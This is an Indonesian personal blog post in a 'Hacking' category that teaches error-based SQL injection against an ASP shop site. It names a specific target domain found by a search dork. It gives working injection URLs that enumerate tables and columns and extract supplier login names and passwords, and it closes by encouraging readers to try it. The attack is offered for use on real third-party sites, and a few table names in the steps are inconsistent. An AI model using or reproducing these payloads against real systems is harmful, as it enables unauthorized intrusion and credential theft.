Sunday, 12.17.2017, 12:49 PM
N30-G4BR13L
Main | Publisher | Registration | Login
Site menu
Section categories
Trick Blog [9]
All About Computer and Network [3]
Hacking [22]
Do you know? [3]
Zona Religi [5]
Belajar Pemrograman [0]
My Diary [1]
My Playlist

My YM Pinbox

Powered by:
Statistics

Total online: 1
Guests: 1
Users: 0
Main » Articles » Hacking

Injection ASP
Kali ini kita akan bahas bagaimana cara SQL Injection pada web asp.
Sekarang kita coba untuk mencari target menggunakan dork inurl:"/e/product/product_list.asp?brand_id=".

misalnya

Target:
http://www.mygarbo.com/e/product/product_list.asp?brand_id=7

Sama seperti php, kita cek apakah web tersebut vuln SQL Injection, kita tes dengan cara menambahkan ' pada akhir url.
http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'

Microsoft OLE DB Provider for ODBC Drivers '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '7' '.
/e/include/i_search.asp,909

Error yang kita cari ialah "Unclosed quotation mark before the character string"

Sekarang kita munculkan nama tablenya
Perintah: and 1=convert(int(select top 1 table_name from information_schema.tables))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int(select%20top%201%20table_name%20from%20information_schema.tables))--

Kemudian muncul error
Microsoft OLE DB Provider for ODBC Drivers '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '
select' to a column of data type int.
/e/include/i_search.asp, 909
Dari error tersebut, kita tahu bahwa nama tabelnya adalah
select.

Sekarang kita munculkan nama tabel berikutnya.
Perintah: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tabel1')))--
URL: http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('select')))--

Kemudian keluar error
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '
b2b_so_message' to a column of data type int.
Nama tabel kedua adalah:"
b2b_so_message",

sekarang kita cari nama tabel ketiga.
Perintah: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tabel1','table2')))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('select','b2b_so_message')))--

Keluarlah error lagi,
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'b2b_spec_matrix' to a column of data type int.
Nama tabel ketiga adalah:"
b2b_spec",

sekarang kita munculkan nama tabel keempat.
Perintah: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('table1','table2','table3')))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('select','b2b_so_message','b2b_spec')))--

Muncullah tabel keempat dalam error berikut.
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '
b2b_spec_matrix' to a column of data type int.
Nama tabel keempat adalah "
b2b_spec_matrix", kita munculkan lagi tabel

selanjutnya, yaitu tabel kelima.
Perintah:and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('table1','table2','table3','table4')))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('select','b2b_so_message','b2b_spec','b2b_spec_matrix')))--

Nah,teruskan cari semua tabelnya n catat satu2 nama tabel tadi
selanjutnya silahkan cari nama tabel lain yang anda anggap lebih menarik.

Misalkan saja kita sudah mendapat tabel yang kita inginkan, misal tabel yang saya inginkan adalah "b2b_supplier"
Sekarang kita coba untuk memunculkan nama nama kolom dalam tabel tersebut.
Perintah: and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='nama_tabel'))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='b2b_supplier'))--

kemudian, keluarlah error.

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'supplier_id' to a column of data type int.
Dari error itu, kita bisa tahu bahwa nama salah satu kolom tabel "b2b_supplier" adalah "supplier_id".

Sekarang kita mencoba untuk menampilkan nama kolom selanjutnya.
Perintah: and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='nama_tabel' and column_name not in ('nama_kolom1')))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='b2b_supplier'%20and%20column_name%20not%20in%20('supplier_id')))--

muncul error
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 's_loginname' to a column of data type int.


Kita munculkan nama kolom selanjutnya.
Perintah: and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='nama_tabel' and column_name not in ('nama_kolom1','nama_kolom2')))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='b2b_supplier'%20and%20column_name%20not%20in%20('supplier_id','s_loginname')))--

Akhirnya muncul error yang ditunggu - tunggu.
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 's_password' to a column of data type int.
Nama kolom ketiga adalah "s_password"

Sebetulnya masih banyak nama kolom lainnya, namun cukup sampai sini saja.

Sekarang kita munculkan data yang ada dalam kolom tersebut.
Perintah untuk 1 kolom: and 1=convert(int,(select top 1 nama_kolom from nama_tabel)
Perintah untuk beberapa kolom: and 1=convert(int,(select top 1 nama_kolom1%2b':'%2bnama_kolom2%2b':'%2bnama_kolom3 from nama_tabel))--
Dengan penjelasan.
%2b merupakan + , dan : sebagai pembatas.
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20supplier_id%2b':'%2bs_loginname%2b':'%2bs_password%20from%20b2b_supplier))--

Selamat mencoba.
Category: Hacking | Added by: neo-gabriel (08.04.2009)
Views: 331 | Rating: 0.0/0 |
Total comments: 0
Name *:
Email *:
Code *:
Search
Login form
My YM Status

Flag Counter
free counters
Silakan Berteriak!!
Link Back ya,
http://neo-gabriel.tk
My Friends

Copyright Neo-Gabriel © 2017